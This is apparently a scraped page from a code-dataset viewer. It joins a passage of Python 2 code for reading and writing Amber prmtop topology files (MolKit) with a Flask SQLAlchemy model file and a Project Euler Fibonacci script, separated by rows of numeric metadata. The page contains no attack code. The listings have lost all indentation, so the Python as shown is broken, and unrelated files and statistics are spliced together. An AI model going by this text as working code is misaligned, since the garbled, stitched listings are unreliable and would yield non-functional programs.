ta2.append( (atomNum[1]-1)*3 )
ta3.append(-(atomNum[2]-1)*3 )
ta4.append(-(atomNum[3]-1)*3 )
tnum.append(newType)
return foundDihedTypes
def getTopology(self, allAtoms, parmDict):
dict = self.prmDict
dict['ititl'] = allAtoms.top.uniq()[0].name + '.prmtop\n'
natom = dict['Natom'] = len(allAtoms)
dict['Nat3'] = natom * 3
dict['AtomNames'] = ''
dict['AtomSym'] = ''
dict['AtomTree'] = ''
dict['Ntypes'] = 0
dict['Natyp'] = 0
dict['Ntype2d'] = 0
dict['Nttyp'] = 0
dict['Masses'] = []
dict['Charges'] = []
dict['Nres'] = 0
dict['AtomRes'] = []
dict['ResNames'] = ''
dict['Ipres'] = [1]
dict['Nmxrs'] = 0
###1/10:
dict['Iac'] = []
self.uniqTypeList = []
#used for construction of Natyp
self.atypList = []
# fill get all arrays that are of len natom
# we have to call for each chain
for ch in self.chains:
self.processChain( ch.residues, parmDict)
#PAD AtomNames with 81 spaces
dict['AtomNames'] = dict['AtomNames'] + 81*' '
dict['AtomSym'] = dict['AtomSym'] + 81*' '
dict['AtomTree'] = dict['AtomTree'] + 81*' '
dict['ResNames'] = dict['ResNames'] + 81*' '
# create Iac list
#iac = []
#tl = self.uniqTypeList
#for a in allAtoms:
# iac.append( tl.index(a.amber_symbol) + 1 )
# delattr(a, 'amber_symbol')
#dict['Iac'] = iac
# to find out the number of bonds with hydrogen we simply count the
# number of hydrogen atoms
hlist = allAtoms.get(lambda x: x.element=='H')
if hlist is not None and len(hlist):
dict['Nbonh'] = numHs = len(hlist)
else:
numHs = 0
# number of bonds not involving an H atom
bonds = allAtoms.bonds[0]
dict['Mbona'] = len(bonds) - numHs
# since no bonds are constrined, Nbona==Mbona
dict['Nbona'] = dict['Mbona']
print 'after call to processChain'
# new process bond info
dict['BondAt1'] = []
dict['BondAt2'] = []
dict['BondNum'] = []
dict['BondHAt1'] = []
dict['BondHAt2'] = []
dict['BondHNum'] = []
dict['Rk'] = []
dict['Req'] = []
self.processBonds(bonds, parmDict)
print 'after call to processBonds'
# now process the angles
dict['AngleAt1'] = []
dict['AngleAt2'] = []
dict['AngleAt3'] = []
dict['AngleNum'] = []
dict['AngleHAt1'] = []
dict['AngleHAt2'] = []
dict['AngleHAt3'] = []
dict['AngleHNum'] = []
dict['Tk'] = []
dict['Teq'] = []
self.processAngles(allAtoms, parmDict)
print 'after call to processAngles'
# now handle the torsions
dict['Nhparm'] = 0
dict['Nparm'] = 0
dict['DihAt1'] = []
dict['DihAt2'] = []
dict['DihAt3'] = []
dict['DihAt4'] = []
dict['DihNum'] = []
dict['DihHAt1'] = []
dict['DihHAt2'] = []
dict['DihHAt3'] = []
dict['DihHAt4'] = []
dict['DihHNum'] = []
dict['Pn'] = []
dict['Pk'] = []
dict['Phase'] = []
dict['Nphih'] = dict['Mphia'] = dict['Nphia'] = dict['Nptra'] = 0
dict['N14pairs'] = []
dict['N14pairlist'] = []
dict['Nnb'] =0
dict['Iblo'] = []
dict['ExclAt'] = []
# FIXME
self.AA5rings ={
'PRO':['N', 'CA', 'CB', 'CG', 'CD'],
'TRP':['CG', 'CD1', 'CD2', 'NE1', 'CE2'],
'HID':['CG', 'ND1', 'CE1', 'NE2', 'CD2'],
'HIE':['CG', 'ND1', 'CE1', 'NE2', 'CD2'],
'HIP':['CG', 'ND1', 'CE1', 'NE2', 'CD2']
}
self.processTorsions(allAtoms, parmDict)
print 'after call to processTorsions'
# some unused values
dict['Nspm'] = 1
dict['Box'] = [0., 0., 0.]
dict['Boundary'] = [natom]
dict['TreeJoin'] = range(natom)
dict['Nphb'] = 0
dict['HB12'] = []
dict['HB10'] = []
llist = ['Ifpert', 'Nbper','Ngper','Ndper','Mbper', 'Mgper',
'Mdper','IfBox', 'IfCap', 'Cutcap', 'Xcap', 'Ycap',
'Zcap', 'Natcap','Ipatm', 'Nspsol','Iptres']
for item in llist:
dict[item] = 0
dict['Cno'] = self.getICO( dict['Ntypes'] )
dict['Solty'] = self.getSOLTY( dict['Natyp'] )
dict['Cn1'], dict['Cn2'] = self.getCNList(parmDict)
return
def getICO(self, ntypes):
ct = 1
icoArray = Numeric.zeros((ntypes, ntypes), 'i')
for i in range(1, ntypes+1):
for j in range(1, i+1):
icoArray[i-1,j-1]=ct
icoArray[j-1,i-1]=ct
ct = ct+1
return icoArray.ravel().tolist()
def getSOLTY(self, ntypes):
soltyList = []
for i in range(ntypes):
soltyList.append(0.)
return soltyList
def getCN(self, type1, type2, pow, parmDict, factor=1):
#pow is 12 or 6
#factor is 1 except when pow is 6
d = parmDict.potParam
if type1=='N3': type1='N '
if type2=='N3': type2='N '
r1, eps1 = d[type1][:2]
r2, eps2 = d[type2][:2]
eps = sqrt(eps1*eps2)
rij = r1 + r2
newval = factor*eps*rij**pow
return newval
def getCNList(self, parmDict):
ntypes = len(self.uniqTypeList)
ct = 1
## size = self.prmDict['Nttyp']
## cn1List = [0]*size
## cn2List = [0]*size
## iac = self.prmDict['Iac']
## cno = self.prmDict['Cno']
## for i in range(ntypes):
## indi = i*ntypes
## ival = self.uniqTypeList[i]
## for j in range(i, ntypes):
## jval = self.uniqTypeList[j]
## ind = cno[indi+j]-1
## cn1List[ind] = self.getCN(jval, ival, 12, parmDict)
## cn2List[ind] = self.getCN(jval, ival, 6, parmDict, 2)
nttyp = self.prmDict['Nttyp']
cn1List = []
cn2List = []
for j in range(ntypes):
jval = self.uniqTypeList[j]
for i in range(j+1):
ival = self.uniqTypeList[i]
cn1List.append(self.getCN(ival, jval, 12, parmDict))
cn2List.append(self.getCN(ival, jval, 6, parmDict, 2))
return cn1List, cn2List
def readSummary(self, allLines, dict):
#set summary numbers
ll = split(allLines[1])
assert len(ll)==12
#FIX THESE NAMES!
natom = dict['Natom'] = int(ll[0])
ntypes = dict['Ntypes'] = int(ll[1])
nbonh = dict['Nbonh'] = int(ll[2])
dict['Mbona'] = int(ll[3])
ntheth = dict['Ntheth'] = int(ll[4])
dict['Mtheta'] = int(ll[5])
nphih = dict['Nphih'] = int(ll[6])
dict['Mphia'] = int(ll[7])
dict['Nhparm'] = int(ll[8])
dict['Nparm'] = int(ll[9])
#called 'next' in some documentation
#NEXT-> Nnb
next = dict['Nnb'] = int(ll[10])
dict['Nres'] = int(ll[11])
ll = split(allLines[2])
assert len(ll)==12
nbona = dict['Nbona'] = int(ll[0])
ntheta = dict['Ntheta'] = int(ll[1])
nphia = dict['Nphia'] = int(ll[2])
numbnd = dict['Numbnd'] = int(ll[3])
numang = dict['Numang'] = int(ll[4])
numptra = dict['Nptra'] = int(ll[5])
natyp = dict['Natyp'] = int(ll[6])
dict['Nphb'] = int(ll[7])
dict['Ifpert'] = int(ll[8])
dict['Nbper'] = int(ll[9])
dict['Ngper'] = int(ll[10])
dict['Ndper'] = int(ll[11])
ll = split(allLines[3])
assert len(ll)==6
dict['Mbper'] = int(ll[0])
dict['Mgper'] = int(ll[1])
dict['Mdper'] = int(ll[2])
dict['IfBox'] = int(ll[3])
dict['Nmxrs'] = int(ll[4])
dict['IfCap'] = int(ll[5])
return dict
def readIGRAPH(self, allLines, numIGRAPH, ind=3):
#the names are not necessarily whitespace delimited
igraph = []
for i in range(numIGRAPH):
ind = ind + 1
l = allLines[ind]
for k in range(20):
it = l[k*4:k*4+4]
igraph.append(strip(it))
#igraph.extend(split(l))
return igraph, ind
def readCHRG(self, allLines, ind, numCHRG, natom):
chrg = []
ct = 0
for i in range(numCHRG):
ind = ind + 1
l = allLines[ind]
newl = []
# build 5 charges per line if enough are left
#otherwise, build the last line's worth
if natom - ct >=5:
rct = 5
else:
rct = natom - ct
for q in range(rct):
lindex = q*16
item = l[lindex:lindex+16]
newl.append(float(item))
ct = ct + 1
chrg.extend(newl)
return chrg, ind
def readNUMEX(self, allLines, ind, numIAC):
numex = []
NumexSUM = 0
for i in range(numIAC):
ind = ind + 1
ll = split(allLines[ind])
newl = []
for item in ll:
newent = int(item)
newl.append(newent)
NumexSUM = NumexSUM + newent
numex.extend(newl)
return numex, ind, NumexSUM
def readLABRES(self, allLines, ind):
done = 0
labres = []
while not done:
ind = ind + 1
ll = split(allLines[ind])
try:
int(ll[0])
done = 1
break
except ValueError:
labres.extend(ll)
#correct for 1 extra line read here
ind = ind - 1
return labres, ind
def readFList(self, allLines, ind, numITEMS):
v = []
for i in range(numITEMS):
ind = ind + 1
ll = split(allLines[ind])
newl = []
for item in ll:
newl.append(float(item))
v.extend(newl)
return v, ind
def readIList(self, allLines, ind, numITEMS):
v = []
for i in range(numITEMS):
ind = ind + 1
ll = split(allLines[ind])
newl = []
for item in ll:
newl.append(int(item))
v.extend(newl)
return v, ind
def readILList(self, allLines, ind, numITEMS, n):
bhlist = []
for i in range(n):
bhlist.append([])
ct = 0
for i in range(numITEMS):
ind = ind + 1
ll = split(allLines[ind])
for j in range(len(ll)):
item = ll[j]
newl = bhlist[ct%n]
newl.append(int(item))
ct = ct + 1
return bhlist, ind
def py_read(self, filename, **kw):
#??dict['Iptres'] #dict['Nspsol'] #dict['Ipatm'] #dict['Natcap']
f = open(filename, 'r')
allLines = f.readlines()
f.close()
dict = {}
#set title
dict['ititl'] = allLines[0]
#get summary numbers
dict = self.readSummary(allLines, dict)
#set up convenience fields:
natom = dict['Natom']
ntypes = dict['Ntypes']
dict['Nat3'] = natom * 3
dict['Ntype2d'] = ntypes ** 2
nttyp = dict['Nttyp'] = ntypes * (ntypes+1)/2
# read IGRAPH->AtomNames
numIGRAPH = int(ceil((natom*1.)/20.))
anames, ind = self.readIGRAPH(allLines, numIGRAPH)
dict['AtomNames'] = join(anames)
# read CHRG->Charges
numCHRG = int(ceil((natom*1.)/5.))
dict['Charges'], ind = self.readCHRG(allLines, ind, numCHRG, natom)
# read AMASS **same number of lines as charges->Masses
dict['Masses'], ind = self.readFList(allLines, ind, numCHRG)
# read IAC **NOT same number of lines as IGRAPH 12!!
numIAC = int(ceil((natom*1.)/12.))
dict['Iac'], ind = self.readIList(allLines, ind, numIAC)
# read NUMEX **same number of lines as IAC
dict['Iblo'], ind, NumexSUM = self.readNUMEX(allLines, ind, numIAC)
# read ICO *Ntype2d/12
numICO = int(ceil((ntypes**2*1.0)/12.))
dict['Cno'], ind = self.readIList(allLines, ind, numICO)
##NB this should be half of a matrix
# read LABRES....no way to know how many
dict['ResNames'], ind = self.readLABRES(allLines, ind)
labres = dict['ResNames']
# read IPRES....depends on len of LABRES
numIPRES = int(ceil((len(labres)*1.)/20.))
dict['Ipres'], ind = self.readIList(allLines, ind, numIPRES)
# read RK + REQ-> depend on numbnd
numbnd = dict['Numbnd']
numRK = int(ceil((numbnd*1.)/5.))
dict['Rk'], ind = self.readFList(allLines, ind, numRK)
dict['Req'], ind = self.readFList(allLines, ind, numRK)
# read TK + TEQ-> depend on numang
numang = dict['Numang']
numTK = int(ceil((numang*1.)/5.))
dict['Tk'], ind = self.readFList(allLines, ind, numTK)
dict['Teq'], ind = self.readFList(allLines, ind, numTK)
# read PK, PN + PHASE-> depend on numptra
nptra = dict['Nptra']
numPK = int(ceil((nptra*1.)/5.))
dict['Pk'], ind = self.readFList(allLines, ind, numPK)
dict['Pn'], ind = self.readFList(allLines, ind, numPK)
dict['Phase'], ind = self.readFList(allLines, ind, numPK)
# read SOLTY
natyp = dict['Natyp']
numSOLTY = int(ceil((natyp*1.)/5.))
dict['Solty'], ind = self.readFList(allLines, ind, numSOLTY)
# read CN1 and CN2
numCN = int(ceil((nttyp*1.)/5.))
dict['Cn1'], ind = self.readFList(allLines, ind, numCN)
dict['Cn2'], ind = self.readFList(allLines, ind, numCN)
# read IBH, JBH, ICBH 12
nbonh = dict['Nbonh']
numIBH = int(ceil((nbonh*3.0)/12.))
[dict['BondHAt1'], dict['BondHAt2'], dict['BondHNum']], ind = \
self.readILList(allLines, ind, numIBH, 3)
# read IB, JB, ICB 12
nbona = dict['Nbona']
numIB = int(ceil((nbona*3.0)/12.))
[dict['BondAt1'], dict['BondAt2'], dict['BondNum']], ind = \
self.readILList(allLines, ind, numIB, 3)
# read ITH, JTH, KTH, ICTH 12
ntheth = dict['Ntheth']
numITH = int(ceil((ntheth*4.0)/12.))
[dict['AngleHAt1'], dict['AngleHAt2'], dict['AngleHAt3'],\
dict['AngleHNum']], ind = self.readILList(allLines, ind, numITH, 4)
# read IT, JT, KT, ICT 12
ntheta = dict['Ntheta']
numIT = int(ceil((ntheta*4.0)/12.))
[dict['AngleAt1'], dict['AngleAt2'], dict['AngleAt3'],\
dict['AngleNum']], ind = self.readILList(allLines, ind, numIT, 4)
# read IPH, JPH, KPH, LPH, ICPH 12
nphih = dict['Nphih']
numIPH = int(ceil((nphih*5.0)/12.))
[dict['DihHAt1'], dict['DihHAt2'], dict['DihHAt3'], dict['DihHAt4'],\
dict['DihHNum']], ind = self.readILList(allLines, ind, numIPH, 5)
# read IP, JP, KP, LP, ICP 12
nphia = dict['Nphia']
numIP = int(ceil((nphia*5.0)/12.))
[dict['DihAt1'], dict['DihAt2'], dict['DihAt3'], dict['DihAt4'],\
dict['DihNum']], ind = self.readILList(allLines, ind, numIP, 5)
# read NATEX 12
#FIX THIS: has to be the sum of previous entries
numATEX = int(ceil((NumexSUM*1.0)/12.))
dict['ExclAt'], ind = self.readIList(allLines, ind, numATEX)
# read CN1 and CN2
# skip ASOL
# skip BSOL
# skip HBCUT
ind = ind + 3
# read ISYMBL 20
asym, ind = self.readIGRAPH(allLines, numIGRAPH, ind)
dict['AtomSym'] = join(asym)
# read ITREE 20
atree, ind = self.readIGRAPH(allLines, numIGRAPH, ind)
dict['AtomTree'] = join(atree)
return dict
def makeList(self, llist, num):
newL = []
for i in range(len(llist[0])):
ni = []
for j in range(num):
ni.append(llist[j][i])
newL.append(ni)
return newL
#functions to write self
def write(self, filename, **kw):
fptr = open(filename, 'w')
dict = self.prmDict
self.writeItitl(fptr, dict['ititl'])
self.writeSummary(fptr)
#WHAT ABOUT SOLTY???
self.writeString(fptr,dict['AtomNames'][:-81])
for k in ['Charges', 'Masses', 'Iac','Iblo','Cno']:
item = dict[k]
f = self.formatD[k]
if f[2]:
self.writeTupleList(fptr, item, f[0], f[1], f[2])
else:
self.writeList(fptr, item, f[0], f[1])
self.writeString(fptr,dict['ResNames'][:-81])
self.writeList(fptr, dict['Ipres'][:-1], '%6d', 12 )
for k in ['Rk', 'Req', 'Tk', 'Teq',
'Pk', 'Pn', 'Phase', 'Solty', 'Cn1','Cn2']:
item = dict[k]
f = self.formatD[k]
if f[2]:
self.writeTupleList(fptr, item, f[0], f[1], f[2])
else:
self.writeList(fptr, item, f[0], f[1])
#next write bnds angs and dihe
allHBnds = zip(dict['BondHAt1'], dict['BondHAt2'],
dict['BondHNum'])
self.writeTupleList(fptr, allHBnds, "%6d", 12, 3)
allBnds = zip(dict['BondAt1'], dict['BondAt2'],
dict['BondNum'])
self.writeTupleList(fptr, allBnds, "%6d", 12, 3)
allHAngs = zip(dict['AngleHAt1'], dict['AngleHAt2'],
dict['AngleHAt3'], dict['AngleHNum'])
self.writeTupleList(fptr, allHAngs, "%6d", 12,4)
allAngs = zip(dict['AngleAt1'], dict['AngleAt2'],
dict['AngleAt3'], dict['AngleNum'])
self.writeTupleList(fptr, allAngs, "%6d", 12, 4)
allHDiHe = zip(dict['DihHAt1'], dict['DihHAt2'],
dict['DihHAt3'], dict['DihHAt4'], dict['DihHNum'])
self.writeTupleList(fptr, allHDiHe, "%6d", 12,5)
allDiHe = zip(dict['DihAt1'], dict['DihAt2'],
dict['DihAt3'], dict['DihAt4'], dict['DihNum'])
self.writeTupleList(fptr, allDiHe, "%6d", 12, 5)
self.writeList(fptr, dict['ExclAt'], '%6d', 12)
fptr.write('\n')
fptr.write('\n')
fptr.write('\n')
for k in ['AtomSym', 'AtomTree']:
item = dict[k][:-81]
self.writeString(fptr, item)
zList = []
for i in range(dict['Natom']):
zList.append(0)
self.writeList(fptr, zList, "%6d", 12)
self.writeList(fptr, zList, "%6d", 12)
fptr.close()
def writeString(self, fptr, item):
n = int(ceil(len(item)/80.))
for p in range(n):
if p!=n-1:
fptr.write(item[p*80:(p+1)*80]+'\n')
else:
#write to the end, whereever it is
fptr.write(item[p*80:]+'\n')
def writeList(self, fptr, outList, formatStr="%4.4s", lineCt=12):
ct = 0
s = ""
nlformatStr = formatStr+'\n'
lenList = len(outList)
for i in range(lenList):
#do something with outList[i]
s = s + formatStr%outList[i]
#ct is how many item are in s
ct = ct + 1
#if line is full, write it and reset s and ct
if ct%lineCt==0:
s = s + '\n'
fptr.write(s)
s = ""
ct = 0
#if last entry write it and exit
elif i == lenList-1:
s = s + '\n'
fptr.write(s)
break
def writeTupleList(self, fptr, outList, formatStr="%4.4s", lineCt=12, ll=2):
ct = 0
s = ""
nlformatStr = formatStr+'\n'
for i in range(len(outList)):
if i==len(outList)-1:
for k in range(ll):
s = s + formatStr%outList[i][k]
ct = ct + 1
if ct%lineCt==0:
s = s + '\n'
fptr.write(s)
s = ""
ct = 0
#after adding last entry, if anything left, print it
if ct!=0:
s = s + '\n'
fptr.write(s)
else:
for k in range(ll):
s = s + formatStr%outList[i][k]
ct = ct + 1
if ct%lineCt==0:
s = s + '\n'
fptr.write(s)
s = ""
ct = 0
def writeItitl(self, fptr, ititl):
fptr.write(ititl)
def writeSummary(self, fptr):
#SUMMARY
#fptr.write('SUMMARY\n')
##FIX THESE NAMES!!!
kL1 = ['Natom','Ntypes','Nbonh','Mbona',\
'Ntheth','Mtheta','Nphih','Mphia','Nhparm',\
'Nparm','Nnb','Nres']
kL2 = ['Nbona','Ntheta','Nphia','Numbnd',\
'Numang','Nptra','Natyp','Nphb','Ifpert',\
'Nbper','Ngper','Ndper']
kL3 = ['Mbper','Mgper','Mdper','IfBox','Nmxrs',\
'IfCap']
for l in [kL1, kL2, kL3]:
newL = []
for item in l:
newL.append(self.prmDict[item])
#print 'newL=', newL
self.writeList(fptr, newL, "%6d", 12)
if __name__ == '__main__':
# load a protein and build bonds
from MolKit import Read
p = Read('sff/testdir/p1H.pdb')
p[0].buildBondsByDistance()
# build an Amber parameter description objects
from MolKit.amberPrmTop import ParameterDict
pd = ParameterDict()
from MolKit.amberPrmTop import Parm
prm = Parm()
prm.processAtoms(p.chains.residues.atoms)
| 34.037879 | 108 | 0.476167 | 6,089 | 53,916 | 4.200526 | 0.139924 | 0.009149 | 0.008914 | 0.013371 | 0.248505 | 0.185401 | 0.145169 | 0.127576 | 0.109982 | 0.102788 | 0 | 0.040112 | 0.384097 | 53,916 | 1,583 | 109 | 34.059381 | 0.730117 | 0.131686 | 0 | 0.204064 | 0 | 0 | 0.081733 | 0.005265 | 0 | 0 | 0 | 0.000632 | 0.050353 | 0 | null | null | 0.000883 | 0.010601 | null | null | 0.013251 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d211994f319cdf819a2e0d0b5d58c4101deb9cd5 | 418 | py | Python | app/main/models/hello_db.py | ZenithClown/flask-docker-template | cf5949fb6f448dd73cc287842b5deb1d5f7bd321 | [
"MIT"
] | null | null | null | app/main/models/hello_db.py | ZenithClown/flask-docker-template | cf5949fb6f448dd73cc287842b5deb1d5f7bd321 | [
"MIT"
] | 41 | 2021-09-01T17:31:47.000Z | 2022-03-28T12:13:12.000Z | app/main/models/hello_db.py | ZenithClown/flask-docker-template | cf5949fb6f448dd73cc287842b5deb1d5f7bd321 | [
"MIT"
] | 1 | 2021-12-22T07:25:08.000Z | 2021-12-22T07:25:08.000Z | # -*- encoding: utf-8 -*-
from .. import db
from ._base_model import ModelSchema
class HelloDB(db.Model, ModelSchema):
"""Use the Model to Establish a Connection to DB"""
__tablename__ = "HelloDB"
id = db.Column(db.Integer, primary_key = True, autoincrement = True, nullable = False)
field = db.Column(db.String(255), nullable = False)
def __init__(self):
ModelSchema().__init__()
| 24.588235 | 93 | 0.665072 | 52 | 418 | 5.057692 | 0.634615 | 0.060837 | 0.076046 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012048 | 0.205742 | 418 | 16 | 94 | 26.125 | 0.78012 | 0.167464 | 0 | 0 | 0 | 0 | 0.020468 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d2162729fc2afb100ad7e2d7244982b56598a414 | 822 | py | Python | scripts/problem0002.py | Joel301/Project_Euler | 2280dc19b8e0a2c956cf0d6db6c7d24eedd5e943 | [
"MIT"
] | null | null | null | scripts/problem0002.py | Joel301/Project_Euler | 2280dc19b8e0a2c956cf0d6db6c7d24eedd5e943 | [
"MIT"
] | null | null | null | scripts/problem0002.py | Joel301/Project_Euler | 2280dc19b8e0a2c956cf0d6db6c7d24eedd5e943 | [
"MIT"
] | null | null | null | #! python3
# -*- coding: utf-8 -*-
"""
Euler description from https://projecteuler.net/
Problem 0002
Each new term in the Fibonacci sequence is generated by adding the previous two
terms. By starting with 1 and 2, the first 10 terms will be:
1, 2, 3, 5, 8, 13, 21, 34, 55, 89, ...
By considering the terms in the Fibonacci sequence whose values do not exceed
four million[4000000], find the sum of the even-valued terms.
"""
#fibonacci list generator
def fibonacci(limit=89):
lst = [1,2]
n1, n2 = 1, 2
while(n2 < limit):
n = n1 + n2
n1 = n2
n2 = n
lst.append(n)
return lst
# main function same aproach as problem0001
def compute(v = 4000000):
ans = sum(x for x in fibonacci(v) if x % 2 == 0)
return ans
if __name__ == "__main__":
print(compute(4000000))
| 22.833333 | 79 | 0.644769 | 132 | 822 | 3.954545 | 0.621212 | 0.011494 | 0.05364 | 0.084291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106796 | 0.248175 | 822 | 35 | 80 | 23.485714 | 0.737864 | 0.585158 | 0 | 0 | 1 | 0 | 0.024242 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.285714 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.